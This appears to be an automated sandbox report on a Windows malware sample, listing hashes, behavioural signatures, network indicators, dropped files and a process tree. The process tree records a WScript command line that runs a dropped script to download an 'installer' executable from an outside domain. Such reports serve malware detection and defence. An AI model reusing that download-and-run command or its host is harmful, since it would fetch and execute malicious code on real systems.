Analysis
max time kernel: 119s
max time network: 121s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 11-05-2024 21:49
Static task: static1
Behavioral task: behavioral1
  Sample: 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe
  Resource: win10v2004-20240426-en
General
Target: 36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe
Size: 184KB
MD5: 36b77f9deebcf77fcc62c6da9bc55994
SHA1: 0187da02d35ed149ecbb60da4e661ff7245bc9a7
SHA256: 488bbf10a6a87a7deb46fb030292cd646960b1af392c3fe0da5f288e895e585a
SHA512: bd2d68caf1b56490726f4c325012b1eabf79e1dd737d1b8039a839625c4fb77b8536cac456007d4958f669eaf4fd9986318f6115b3738c035b48951dba44e227
SSDEEP: 3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3L:/7BSH8zUB+nGESaaRvoB7FJNndn2
Malware Config
Signatures
- Blocklisted process makes network request (11 IoCs)
  flow  pid   Process
  6     1696  WScript.exe
  8     1696  WScript.exe
  10    1696  WScript.exe
  12    2516  WScript.exe
  13    2516  WScript.exe
  15    2004  WScript.exe
  16    2004  WScript.exe
  18    2212  WScript.exe
  19    2212  WScript.exe
  25    2088  WScript.exe
  26    2088  WScript.exe
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (20 IoCs)
  description                       pid   Process                                             procid_target
  PID 2424 wrote to memory of 1696  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  28
  PID 2424 wrote to memory of 1696  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  28
  PID 2424 wrote to memory of 1696  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  28
  PID 2424 wrote to memory of 1696  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  28
  PID 2424 wrote to memory of 2516  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  30
  PID 2424 wrote to memory of 2516  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  30
  PID 2424 wrote to memory of 2516  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  30
  PID 2424 wrote to memory of 2516  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  30
  PID 2424 wrote to memory of 2004  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  32
  PID 2424 wrote to memory of 2004  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  32
  PID 2424 wrote to memory of 2004  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  32
  PID 2424 wrote to memory of 2004  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  32
  PID 2424 wrote to memory of 2212  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  34
  PID 2424 wrote to memory of 2212  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  34
  PID 2424 wrote to memory of 2212  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  34
  PID 2424 wrote to memory of 2212  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  34
  PID 2424 wrote to memory of 2088  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  38
  PID 2424 wrote to memory of 2088  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  38
  PID 2424 wrote to memory of 2088  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  38
  PID 2424 wrote to memory of 2088  2424  36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe  38
Processes
- C:\Users\Admin\AppData\Local\Temp\36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\36b77f9deebcf77fcc62c6da9bc55994_JaffaCakes118.exe"
  Depth: 1
  - Suspicious use of WriteProcessMemory
  PID: 2424
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
    Depth: 2
    - Blocklisted process makes network request
    PID: 1696
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
    Depth: 2
    - Blocklisted process makes network request
    PID: 2516
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
    Depth: 2
    - Blocklisted process makes network request
    PID: 2004
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
    Depth: 2
    - Blocklisted process makes network request
    PID: 2212
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2359.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf2359.exe
    Depth: 2
    - Blocklisted process makes network request
    PID: 2088
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
  Filesize: 1KB
  MD5: 844a93e096b7ac8f56f9286642d59fed
  SHA1: 6bf7e649df885f4338d9b84864c4fb2c6d06d2ed
  SHA256: 5a344dea279de4e33fd977f55d63b9518cac5ad62e2e5cd09a81f56ced29eddb
  SHA512: eea9f130fdbb0b0ad23e0fcfc25c14be2827cb641f1d1a6aa2097a1e8b9b81e8e3ebc5633f8fccac60039d361da971f1c5e1085371ca23bc0c3c125bdddd60df
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
  Filesize: 724B
  MD5: 8202a1cd02e7d69597995cabbe881a12
  SHA1: 8858d9d934b7aa9330ee73de6c476acf19929ff6
  SHA256: 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
  SHA512: 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
  Filesize: 410B
  MD5: 0211d032752fa7708b086e24c137de1d
  SHA1: 12b45877562914e3cfb39048063e0c843c00685a
  SHA256: 13fbd17d8c8560e991131140cec5536f896966671e94aac9105ec1332efae235
  SHA512: 4b31365df75c361febaff904246297f581f2ced3839f32f6d5e66a3855ed2a62f26550c2718ff6698c625774d55df4e9b71174e81e8e8fc319e6812edb959228
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: b7b1f8873696419f4364540ba5d6002b
  SHA1: e86b49c21590e605d313f60e95554a879a405fb0
  SHA256: 31d9cf9b567a39c7db288431a2e0b3725aa976bf6dbb67afee5a233e7d71dfdc
  SHA512: fabc8d079de03fae7eb9ef1d0b80b448c7673a3afdaadf484727dd4d4f2ea426af3375b8a4d8a98680ee837de64e22cfd593d02a9deaf318e13540d6efdf6dd2
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
  Filesize: 392B
  MD5: abf22e1b086a79e5b39991bfe77196aa
  SHA1: 4bd5292871a129eee5bf3b0b579e499f67ac2218
  SHA256: eb5464f9f4f99bf341ad6d1af1434656c53f6f58c1aba33b69ad5f70325a1850
  SHA512: 89adff9b30cf0110bb52a3a11eeb1eba1c4e61c1b38fe7fe69b26b337e3fe93590e05be187f2e920527dcaf24ecb2ba6c38dbb63352b4962b7cc5660f713e2c8
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm
  Filesize: 40KB
  MD5: bdd845e8776dc7d46e2f2755af60892e
  SHA1: ba62ef4b89773dfa6753cd7c39e18388eff3ce33
  SHA256: 9bf90d3712349c7fb0bd2877923f98c77789e9bcbb7e544ba8e5d61fa6cdac3b
  SHA512: 81a661570ea1f82189365f3f9e6c31812a85bd92b65e674ae01df700c43225995a434c751ed710dd65ffd8e3c0091d58ed4d32e5de16b5873ea3cbd8286842ad
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm
  Filesize: 40KB
  MD5: 923ab9d2edf19ff3412e06d73dd1da77
  SHA1: 62ba6cf4214028d0c674f290679ea6f82b59d093
  SHA256: 28b7948b4a13b8c975a5cb08cfc9a90b1d6e63d95323a14e5a4e64744869555e
  SHA512: 25f49c4ffd6ca5adfc16bb6bb9bba89e16a1e18973cb4a854f43bfc287e0604f2ef6d7a746896c48cd3975b7445f1fbc1619a0ea7433ee5eaa7683e6df6f21fe
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm
  Filesize: 6KB
  MD5: d615e9b74470164a6669f3b0ff787e7b
  SHA1: 3c6456e4dea05bd39b33f75a5a2e882f7b4edcdf
  SHA256: 05e71ae87c9bdfe255beac821c0371a3cc22e513cdc9c514149ece84b2804693
  SHA512: 9f6948eb84db3d60bd08291fb10989f559165401d00fc0e0f987b1dfd345abc6f7865b906b4c54c177289c80c9305f43fa5177db495c668d055e59860689b7f4
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm
  Filesize: 40KB
  MD5: b22769cfe4cd018b036d01cca9cd2837
  SHA1: 55e06bba7f4cab5f04127b38fece10affe5e0469
  SHA256: dcd55a9dc7e5138fbca694f8486975fc38165439a69c4fb3eb6b305f18813d87
  SHA512: 1c5fdee0b441c1eb782f5f4f5808e2661a6971723d95adc68fdf5c0998859000cabb5c890e09474a3d4442b416d125258f670ee89501a40c73d7b0a9204ce4a7
- Filesize: 68KB
  MD5: 29f65ba8e88c063813cc50a4ea544e93
  SHA1: 05a7040d5c127e68c25d81cc51271ffb8bef3568
  SHA256: 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
  SHA512: e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
- Filesize: 177KB
  MD5: 435a9ac180383f9fa094131b173a2f7b
  SHA1: 76944ea657a9db94f9a4bef38f88c46ed4166983
  SHA256: 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
  SHA512: 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
- Filesize: 3KB
  MD5: 3813cab188d1de6f92f8b82c2059991b
  SHA1: 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
  SHA256: a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
  SHA512: 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
- Filesize: 175B
  MD5: 92451270d1ea8a013e1620e216fe5456
  SHA1: d5b1b80f5991f9f201ea56900f02035193a837c1
  SHA256: 632d1aae8a74d32b7f006d1a78f0f5d41ee5ca97d5b730e997c0d00028ee0efb
  SHA512: c63b2c1bd3d6faf275e182ee6ce0afbfbec869e33462ea94cd81abe76ed1409c4e188255afd686b42661320e8ba70e7dab565439d2ad5de72410a3357d23e9bb